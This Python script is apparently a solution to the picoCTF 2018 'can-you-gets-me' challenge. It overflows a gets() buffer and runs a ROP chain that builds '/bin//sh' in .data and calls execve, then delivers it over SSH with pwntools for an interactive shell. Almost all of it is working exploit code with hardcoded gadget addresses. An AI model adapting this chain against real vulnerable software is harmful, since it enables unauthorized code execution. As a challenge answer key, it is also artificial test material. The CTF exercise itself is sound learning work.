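"""picoCTF 2018 "can-you-gets-me": ROP chain for the 32-bit ./gets binary,
delivered over SSH with pwntools.

The binary reads input with gets(), which has no length check, so 28 bytes
of padding reach the saved return address. The chain then writes
"/bin//sh\\0" into .data with pop/mov gadgets, loads ebx (path), ecx (argv)
and edx (envp), sets eax = 11 (execve on i386) and fires int 0x80.

Usage: python exploit.py USER [PASSWORD]
When PASSWORD is omitted it is prompted for, so it does not end up in shell
history or in `ps` output. The payload is built from bytes throughout so the
script runs unchanged on Python 2 and Python 3 (the original mixed str and
struct output, which raises TypeError on Python 3).
"""
from struct import pack
import getpass
import sys

HOST = '2018shell1.picoctf.com'
PROBLEM_DIR = '/problems/can-you-gets-me_0_8ac5bddeab74e647cd6d31642246a12a'
BINARY = './gets'
PADDING = 28  # bytes from the start of gets()'s buffer to the saved eip

# Gadget and data addresses in the statically linked binary. The addresses
# are absolute, i.e. the binary is assumed non-PIE; a rebuilt binary needs
# new values from ROPgadget/ropper.
POP_EDX = 0x0806f02a      # pop edx ; ret
POP_EAX = 0x080b81c6      # pop eax ; ret
POP_EBX = 0x080481c9      # pop ebx ; ret
POP_ECX = 0x080de955      # pop ecx ; ret
MOV_EDX_EAX = 0x080549db  # mov dword ptr [edx], eax ; ret
XOR_EAX = 0x08049303      # xor eax, eax ; ret
INC_EAX = 0x0807a86f      # inc eax ; ret
INT_80 = 0x0806cc25       # int 0x80
DATA = 0x080ea060         # writable scratch space in .data
SYS_EXECVE = 11           # i386 syscall number of execve


def _slot(value):
    """Pack one 32-bit little-endian stack slot (gadget address or argument)."""
    return pack('<I', value)


def _store_word(addr, word):
    """Chain fragment that writes the 4 raw bytes *word* to *addr*.

    Loads the destination into edx and the literal into eax via pop gadgets,
    then executes `mov [edx], eax`.
    """
    if len(word) != 4:
        raise ValueError('store needs exactly 4 bytes, got %d' % len(word))
    return b''.join([_slot(POP_EDX), _slot(addr), _slot(POP_EAX), word,
                     _slot(MOV_EDX_EAX)])


def _store_zero(addr):
    """Chain fragment that writes a NUL dword to *addr*.

    Uses `xor eax, eax` rather than popping a literal 0 so the string
    terminator comes from a gadget instead of an immediate in the payload.
    """
    return b''.join([_slot(POP_EDX), _slot(addr), _slot(XOR_EAX),
                     _slot(MOV_EDX_EAX)])


def build_payload():
    """Return the full line to send: padding followed by the execve ROP chain.

    Layout of .data after the writes: DATA = "/bin//sh", DATA+8 = 0. The
    syscall then runs execve(DATA, DATA+8, DATA+8): argv and envp both point
    at the NUL dword, i.e. an empty argument list.

    Raises:
        ValueError: if the chain contains a newline, which gets() would treat
            as end of input and silently truncate the payload.
    """
    parts = [b'A' * PADDING]
    # Build "/bin//sh\0" in .data (the doubled slash pads the path to 8 bytes).
    parts.append(_store_word(DATA, b'/bin'))
    parts.append(_store_word(DATA + 4, b'//sh'))
    parts.append(_store_zero(DATA + 8))
    # execve arguments: ebx = path, ecx = argv, edx = envp.
    parts.extend([_slot(POP_EBX), _slot(DATA)])
    parts.extend([_slot(POP_ECX), _slot(DATA + 8)])
    parts.extend([_slot(POP_EDX), _slot(DATA + 8)])
    # eax = 11 built from zero with inc gadgets, avoiding an immediate.
    parts.append(_slot(XOR_EAX))
    parts.extend([_slot(INC_EAX)] * SYS_EXECVE)
    parts.append(_slot(INT_80))

    payload = b''.join(parts)
    if b'\n' in payload:
        raise ValueError('payload contains 0x0a; gets() would truncate it')
    return payload


def main(argv=None):
    """Connect over SSH, run the target in the problem directory, send the
    chain after its prompt and hand the resulting shell to the user.

    Args:
        argv: command-line arguments without the program name; defaults to
            sys.argv[1:]. Expects USER and optionally PASSWORD.
    """
    # pwntools is only needed for delivery; importing it here keeps
    # build_payload() usable (and testable) without pwntools installed.
    from pwn import ssh

    argv = sys.argv[1:] if argv is None else argv
    if not argv:
        sys.exit('usage: %s USER [PASSWORD]' % sys.argv[0])
    user = argv[0]
    # A password on the command line is visible in `ps` and shell history;
    # prompt for it unless the caller insists on passing it.
    password = argv[1] if len(argv) > 1 else getpass.getpass('picoCTF password: ')

    shell = ssh(host=HOST, user=user, password=password)
    try:
        shell.set_working_directory(PROBLEM_DIR)
        target = shell.process(BINARY)  # not named `process`: that shadows pwntools' process()
        # Wait for the '!' that ends the program's prompt before sending the line.
        target.sendlineafter(b'!', build_payload())
        target.interactive()
    finally:
        shell.close()


if __name__ == '__main__':
    main()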